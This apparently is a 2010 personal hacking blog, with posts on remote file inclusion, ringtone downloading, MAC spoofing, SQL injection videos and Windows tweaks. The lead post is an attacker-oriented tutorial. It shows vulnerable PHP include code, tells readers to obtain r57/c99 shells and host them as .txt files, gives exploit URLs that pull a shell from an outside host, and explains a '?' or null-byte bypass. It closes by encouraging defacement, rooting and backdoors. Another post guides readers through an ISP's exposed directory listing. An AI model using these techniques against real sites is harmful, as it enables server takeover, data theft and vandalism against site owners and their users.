Sunday 29 August 2010

Basic on Remote File Inclusion[RFI]

This time, I am going to give you information about the remote file inclusion vulnerability in the webpages which can be compromised to root and mass the server.
First, let me say what remote file inclusion(RFI) is... File inclusion vulnerability is the result of poor & insecure programming practice which allows us to include the files in the website's php scripts. Now, whenever I say remote file inclusion, the file that is going to be included is from different server. Simple, you would include some evil file with malicious code from another server in the victim site you are hacking. Such evil file is called shell and should be in .txt format so as to get executed in the victim site. There are numerous shells available on the internet. Google for r57 or c99 shell and you should get the shells. Now you need to upload these shells to the server(free hosting providers) with .txt extension.


Let me suppose, I am browsing a site www.victim.com & notice in the URL(in address bar) that one of the GET arguments is index.php?page=home.php. I click on the link & it changes to index.php?page=game.php

    Example:

        http://www.victim.com/index.php?page=home.php
        http://www.victim.com/index.php?page=game.php

Let me show you the code for index.php that makes it vulnerable to RFI.


    <?php
     $mypage=$_GET['page'];
     include($mypage);
    ?>

So, the code sets $mypage to $_GET['page'] & whenever we go to http://www.victim.com/index.php?page=game.php, game.php file is included by include() function i.e. the content of blog.php is pasted into index.php
But this allows malicious attacker to include remote files also. I mean, if you put:

    http://www.victim.com/index.php?page=http://www.yoursite.com

 you will see the content of your site on the site.

Now you got the idea of remote file inclusion, its time to exploit it. So we use evil scripts called shells which provide us the interface of viewing, deleting & editing files, getting server info & much more.

Say, I've uploaded my shell in free hosting provider & the URL(location) of my shell is http://www.hacky0u.free.com/lol.txt, I would do:


    http://www.victim.com/index.php?page=http://www.hacky0u.free.com/lol.txt

Now, with this I get shell on the server & can do anything from deleting files to stealing the informations from there.
But sometimes, programmers write codes like below:


    <?php
     $mypage=$_GET['page'];
     include($mypage.".php");
    ?>

So if we have index.php?page=game, the game.php file is getting included. So this seems to include only php files & our .txt shell file won't get included instead it would include .txt.php making us fail. But, if we add "?" this gets bypassed & we can still gain shell. Similarly, if ? doesn't work, you can injection nullbyte() in place of ? that denotes end of the string.

    Example: http://www.victim.com/index.php?page=http://www.hacky0u.free.com/lol.txt?

After getting shell, we may delete files, do mass defacements, gain root access using root exploits, keep backdoors, install r00tkits,etc. & etc. Seems elite but you can learn all these things.
Now, something about avoiding RFI... If you are a web programmer, the you should know the switch-case-default statement. Use it for the navigation to the pages instead of above shown scripts. Switch is simple yet the best solution.
Learn it, hack it & enjoy it...

Read more...

Download Spicenepal/Ncell PRBT tones

I was just browsing the site of mero mobile (www.spicenepal.com) quite a long ago and was checking the caller ring back tones. Though its not any kind of hack, if you guys love some wav tones of the site and want to download the ring back tones, I have come up with the solution for you.


First navigate to:


Now you will see some page that shows "forbidden" and etc. Anyway, now navigate to:


You will get directory listing. Now go to each folder and download the wav tones for you.
Some sample links are:

http://prbt.spicenepal.com:9998/colorring/al/600/001/0/0000/0001/
http://prbt.spicenepal.com:9998/colorring/al/600/001/0/0000/0000/
http://prbt.spicenepal.com:9998/colorring/rl/600/001/0/0000/0000/
http://prbt.spicenepal.com:9998/colorring/rl/600/001/0/0000/0001/

You will get list of wav files, listen to them and download them.
I am sorry if there already exists the download link in the site but if not, this might help you. Hope this helps some of you guys out there.
Thanks.

Read more...

Change default program installation folder in XP

Whenever you install any programs in your computer, the installation will be done in C:\program files folder. But what if you wanted to change this setting and make your programs install in the different drive or location by default. There is a simple registry hack in order to change the default installation folder.


First, start registry editor by typing regedit.exe in run menu. Then, go to the following:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

Now, change the value of ProgramFilesDir to whatever you prefer. Now exit registry and reboot your system to have your default software installation folder changed from program files to that of your choice.
Thanks.

Read more...

Online Nepali Unicode Converter

Maybe you are searching for some unicode converters that would help you type text in english and convert that in nepali. So I have collected some of the sites that provide us the nepali unicode conversion for free.


www.unicodenepali.com

www.ashesh.com.np/nepali-unicode.php

xnepali.com/unicode/convert.php

www.google.com/transliterate/indic/Nepali

I hope this will be useful for many of you.

Read more...

Changing MAC address in LINUX

Previously I had posted on Changing MAC address in Windows but what if you want to change the MAC address in your LINUX distro. As I've said in the previous post, MAC spoofing can be great for the network with MAC-based restrictions.

There's a utility called ifconfig in LINUX which can be used to view and configure the network interfaces in your LINUX distro. The following shows how you can view your MAC address of the interface and then how you can modify the MAC.

ifconfig -a | grep HWaddr
# This will display the hardware address i.e. MAC of your machine.

Next, enter the following commands in your linux by logging in as the root user.

ifconfig eth0 down
ifconfig eth0 hw ether 00:1E:90:E9:77:D7
ifconfig eth0 up
# This will change the hardware address i.e. MAC of your machine.

Now you can view your changed MAC by again entering the command:

ifconfig -a | grep HWaddr
# This will display the hardware address i.e. MAC of your machine.

This is how you can use ifconfig command to configure MAC for your interface(eth0 in this case). But there exists a tool called GNU MAC Changer which can be used for viewing and manipulating the MAC address of network interfaces. You can download this utility from HERE. This page also lists the proper instructions for using the utility.

I hope you find this post useful.

Read more...

Saturday 28 August 2010

Blind SQL Injection video

Previously I had posted a video tutorial on Basic SQL injection, that presented the basic of SQL injection in the mysql backed php web applications. This time, I've uploaded one of my old videos and that's on blind sql injection.


 
Blind SQL Injection Video Tutorial

Be sure to comment on this tutorial.

Read more...

Tuesday 24 August 2010

Basic SQL injection video by Me

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

I had made a simple video demonstrating the basic of SQL injection attacks in my own localhost and now I've uploaded it for you.
Basic SQL Injection Video By Sam207

Enjoy. I'll be uploading other videos by me.

Read more...

Batch Mini Antivirus - Remove virii effects

Batch Mini Antivirus is a tool written in the commandline batch. The tool was written by me around a year ago and this tool provides removing the effects of the most virii.

This tool will be more efficient if run in safe mode. This tool can be used to remove virii and their effects from hard drives and USB removable drives.
The program provides various options such as deleting autorun.inf, making all files and folders visible, checking and repairing bad sectors, deleting all files in drive of specific size, deleting suspicious hidden files(be careful with this), deactivating virii processes, repairing registry effects due to virii, and removing few virii from the system.


DOWNLOAD BATCH ANTIVIRUS FROM HERE

I hope you will find this tool useful. Please be sure to write your comments on this too.

Read more...